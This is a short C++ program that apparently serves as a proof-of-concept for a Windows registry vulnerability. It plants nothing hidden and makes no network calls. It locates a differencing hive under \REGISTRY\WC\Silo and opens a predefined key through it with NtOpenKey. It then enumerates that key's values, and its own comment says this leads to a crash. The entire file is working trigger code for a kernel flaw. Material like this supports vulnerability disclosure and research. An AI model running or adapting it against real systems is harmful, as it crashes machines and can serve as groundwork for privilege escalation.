#define WIN32_NO_STATUS
#include <Windows.h>
#undef WIN32_NO_STATUS
#include <winternl.h>
#include <ntstatus.h>

#include <cstdio>

#pragma comment(lib, "ntdll")

extern "C" {

NTSTATUS NTAPI NtOpenKey(PHKEY, ACCESS_MASK, POBJECT_ATTRIBUTES);

}  // extern "C"

int main() {
  HKEY hHiveList, hPredefKey;
  WCHAR wchValueName[200];
  DWORD cchValueName;
  LSTATUS st;
  NTSTATUS Status;

  //
  // Verify that a predefined key exists under HKCU.
  //

  st = RegOpenKeyExA(HKEY_CURRENT_USER, "PredefinedKey", 0, KEY_READ, &hPredefKey);
  if (st != ERROR_SUCCESS || (ULONG_PTR)hPredefKey < 0x80000000) {
    printf("HKCU\\PredefinedKey doesn't exist, or isn't a predefined key\n");
    return 1;
  }

  //
  // Find a differencing hive pointing at HKCU.
  //
 
  st = RegOpenKeyExW(HKEY_LOCAL_MACHINE,
                     L"SYSTEM\\CurrentControlSet\\Control\\hivelist",
                     0,
                     KEY_READ,
                     &hHiveList);

  if (st != ERROR_SUCCESS) {
    printf("RegOpenKeyExW failed with error %d\n", st);
    return 1;
  }

  for (DWORD dwIndex = 0;; dwIndex++) {
    cchValueName = sizeof(wchValueName) / sizeof(WCHAR);

    st = RegEnumValueW(hHiveList,
                       dwIndex,
                       wchValueName,
                       &cchValueName,
                       NULL,
                       NULL,
                       NULL,
                       NULL);

    if (st != ERROR_SUCCESS) {
      printf("RegEnumValueW failed with error %d\n", st);
      return 1;
    }

    if (!_wcsnicmp(wchValueName, L"\\REGISTRY\\WC\\Silo", 17) &&
        !_wcsicmp(&wchValueName[cchValueName - 8], L"user_sid")) {
      break;
    }
  }

  RegCloseKey(hHiveList);

  //
  // Open the predefined key through the differencing hive.
  //

  wcsncat_s(wchValueName, L"\\PredefinedKey", 14);

  UNICODE_STRING PredefKeyPath;
  RtlInitUnicodeString(&PredefKeyPath, wchValueName);

  OBJECT_ATTRIBUTES ObjectAttributes;
  InitializeObjectAttributes(&ObjectAttributes, &PredefKeyPath, 0, NULL, NULL);

  Status = NtOpenKey(&hPredefKey, KEY_READ, &ObjectAttributes);

  if (!NT_SUCCESS(Status)) {
    printf("NtOpenKey failed with error %x\n", Status);
    return 1;
  }

  //
  // Try to enumerate the values of the predefined key, leading to a crash.
  //

  cchValueName = sizeof(wchValueName) / sizeof(WCHAR);

  st = RegEnumValueW(hPredefKey,
                     0,
                     wchValueName,
                     &cchValueName,
                     NULL,
                     NULL,
                     NULL,
                     NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegEnumValueW failed with error %d\n", st);
    return 1;
  }

  RegCloseKey(hPredefKey);

  return 0;
}